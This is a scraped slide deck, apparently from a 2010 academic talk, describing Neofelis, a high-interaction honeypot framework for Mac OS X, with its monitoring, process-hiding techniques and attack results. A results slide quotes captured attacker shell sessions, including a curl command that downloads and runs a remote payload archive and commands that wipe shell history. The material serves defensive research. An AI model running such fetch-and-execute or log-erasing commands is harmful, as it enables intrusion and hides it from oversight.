Neofelis High-Interaction Honeypot Framework for Mac OS X Joo - - PowerPoint PPT Presentation

neofelis
SMART_READER_LITE
LIVE PREVIEW

Neofelis High-Interaction Honeypot Framework for Mac OS X Joo - - PowerPoint PPT Presentation

Nov 27, 2023 216 likes •380 views

Neofelis High-Interaction Honeypot Framework for Mac OS X Joo Miguel Franco Francisco Nina Rente { jmfranco, frente } at dei.uc.pt Software and System Engineering Research Group FCT University of Coimbra Agenda Agenda

slide-1
SLIDE 1

Neofelis

High-Interaction Honeypot Framework for Mac OS X

João Miguel Franco Francisco Nina Rente

{ jmfranco, frente } at dei.uc.pt

Software and System Engineering Research Group FCT – University of Coimbra

slide-2
SLIDE 2

IBWAS'10 2

Agenda Agenda

  • Introduction

Introduction

  • Honeypot Definition

Honeypot Definition

  • Related Work

Related Work

  • Project Goals

Project Goals

  • System Architecture

System Architecture

  • Tested Scenarios

Tested Scenarios

  • Results

Results

  • Conclusion and Further Work

Conclusion and Further Work

slide-3
SLIDE 3

IBWAS'10 3

Introduction Introduction

  • There is not such thing as total Secure Systems!

There is not such thing as total Secure Systems!

  • Zero-day vulnerabilities are more frequently

Zero-day vulnerabilities are more frequently

  • The sooner you have information on security flaws

The sooner you have information on security flaws

Sooner critical updates are released Less Assets will be Affected

slide-4
SLIDE 4

IBWAS'10 4

Honeypot Definition Honeypot Definition

  • Computation resource constantly monitored, whose objective

Computation resource constantly monitored, whose objective is to be tested, attacked and compromised. is to be tested, attacked and compromised.

  • The data collected during the attack will be the base of a

The data collected during the attack will be the base of a posterior analysis. posterior analysis.

  • Two types of Honeypots

Two types of Honeypots High-Interaction Low-Interaction

slide-5
SLIDE 5

IBWAS'10 5

Related Work Related Work

  • Argos

Argos

  • Uses Dynamic Taint Analysis

Uses Dynamic Taint Analysis

  • Detects zero-day exploits

Detects zero-day exploits

  • Does not capture activities during the attack

Does not capture activities during the attack

  • HoneypotX

HoneypotX

  • Currently not supported

Currently not supported

  • Older version of Mac OS X, 10.1

Older version of Mac OS X, 10.1

  • Low-interaction honeypot

Low-interaction honeypot

slide-6
SLIDE 6

IBWAS'10 6

Project Goals Project Goals

  • Install and maintain a high-interaction honeypot for Mac OS X

Install and maintain a high-interaction honeypot for Mac OS X

  • Implement a framework

Implement a framework

Totally configurable Totally configurable Robust, Scalable Robust, Scalable Ensure integrity of the captured data Ensure integrity of the captured data Generate statistical data Generate statistical data

  • Well defined security boundaries

Well defined security boundaries

slide-7
SLIDE 7

IBWAS'10 7

General Architecture General Architecture

slide-8
SLIDE 8

IBWAS'10 8

Information Capture Information Capture

  • IOKeys

IOKeys

Pressed keys during a SSH session Pressed keys during a SSH session SSH session information SSH session information Commands passed as arguments Commands passed as arguments Commands executed in a web-shell Commands executed in a web-shell

  • IOEthernet

IOEthernet

Incoming and Outgoing network packets Incoming and Outgoing network packets

  • FSLogger

FSLogger

slide-9
SLIDE 9

IBWAS'10 9

slide-10
SLIDE 10

IBWAS'10 10

Dissimulate Monitoring Activities Dissimulate Monitoring Activities

  • HideProc

HideProc

__sysctl() __sysctl()

  • HideFiles

HideFiles

getdirentries() getdirentries() getdirentries64() getdirentries64() getdirentriesattr() getdirentriesattr()

  • Hide loaded kernel extensions

Hide loaded kernel extensions

Remove the Kexts from kmod_info linked list Remove the Kexts from kmod_info linked list

slide-11
SLIDE 11

IBWAS'10 11

Tested Scenarios Tested Scenarios

  • Innumerable possible scenarios

Innumerable possible scenarios

  • Tested against two

Tested against two

  • Brute-force attack

Brute-force attack

  • Normal user with weak credentials

Normal user with weak credentials

  • Exploitation of a HTTP Web-server

Exploitation of a HTTP Web-server

  • Deployed a web-site on Joomla!

Deployed a web-site on Joomla!

slide-12
SLIDE 12

IBWAS'10 12

slide-13
SLIDE 13

IBWAS'10 13

Results Results (HTTP Server)

(HTTP Server)

  • Deployed a site based on Joomla!, which had the

Deployed a site based on Joomla!, which had the vulnerability CVE-2008-3681 vulnerability CVE-2008-3681

  • Recorded 14 Attacks

Recorded 14 Attacks

Hungary, Belarus, Portugal, Latvia and South Korea Hungary, Belarus, Portugal, Latvia and South Korea

  • 2 intrusions that took advantage of the vulnerabilities

2 intrusions that took advantage of the vulnerabilities

slide-14
SLIDE 14

IBWAS'10 14

Results Results (Brute-Force SSH)

(Brute-Force SSH)

2010-06-29 02:28:13 test França - Isle de France 2010-06-29 02:28:13 test França - Isle de France

02:28:15 - w 02:28:15 - w 02:28:24 - cat /proc/cpuinfo 02:28:24 - cat /proc/cpuinfo 02:28:36 - cat /proc/cpuinfo 02:28:36 - cat /proc/cpuinfo 02:28:37 - w 02:28:37 - w 02:28:43 - uname -a 02:28:43 - uname -a 02:32:38 - cd /tmp 02:32:38 - cd /tmp 02:32:40 - ls -a 02:32:40 - ls -a 02:32:57 - cat final4 02:32:57 - cat final4 02:32:59 - ls -a 02:32:59 - ls -a 02:34:19 - curl -O http://download.microsoft.com/download/win2000platform/SP/SP3/NT5/EN-US/W2 02:34:19 - curl -O http://download.microsoft.com/download/win2000platform/SP/SP3/NT5/EN-US/W2 02:41:47 - curl -O ; http://rohacker.ucoz.ru/DarwinBooT.tgz ; tar xvf DarwinBooT.tgz ; cd DarwinBooT ; chmod +x 02:41:47 - curl -O ; http://rohacker.ucoz.ru/DarwinBooT.tgz ; tar xvf DarwinBooT.tgz ; cd DarwinBooT ; chmod +x * ; ./darwin ; cd .. ; rm -rf DarwinBooT.tgz ; mv DarwinBooT .cmd * ; ./darwin ; cd .. ; rm -rf DarwinBooT.tgz ; mv DarwinBooT .cmd

2010-06-29 17:07:24 test França - Midi-Pyrenees, Pamiers 2010-06-29 17:07:24 test França - Midi-Pyrenees, Pamiers

17:07:26 - w 17:07:26 - w 17:07:30 - uname -a 17:07:30 - uname -a 17:07:52 - ls -a 17:07:52 - ls -a 17:07:57 - rm -rf .bash_history 17:07:57 - rm -rf .bash_history 17:07:58 - passwd 17:07:58 - passwd 17:08:23 - w 17:08:23 - w 17:08:25 - ls -a 17:08:25 - ls -a 17:08:32 - history -c -d offset 17:08:32 - history -c -d offset 17:08:33 - exit 17:08:33 - exit

slide-15
SLIDE 15

IBWAS'10 15

Conclusion and Futher Work Conclusion and Futher Work

  • Neofelis is the first High-Interaction Honeypot for

Neofelis is the first High-Interaction Honeypot for Mac OS X Mac OS X

  • High-Level of stealthiness

High-Level of stealthiness

  • Filter network packets through pattern detection

Filter network packets through pattern detection

  • Integration with an IDS

Integration with an IDS

slide-16
SLIDE 16

IBWAS'10 16

Thank you very much for your attention. Thank you very much for your attention. Questions? Questions?

jfranco at dei.uc.pt frente at dei.uc.pt jfranco at dei.uc.pt frente at dei.uc.pt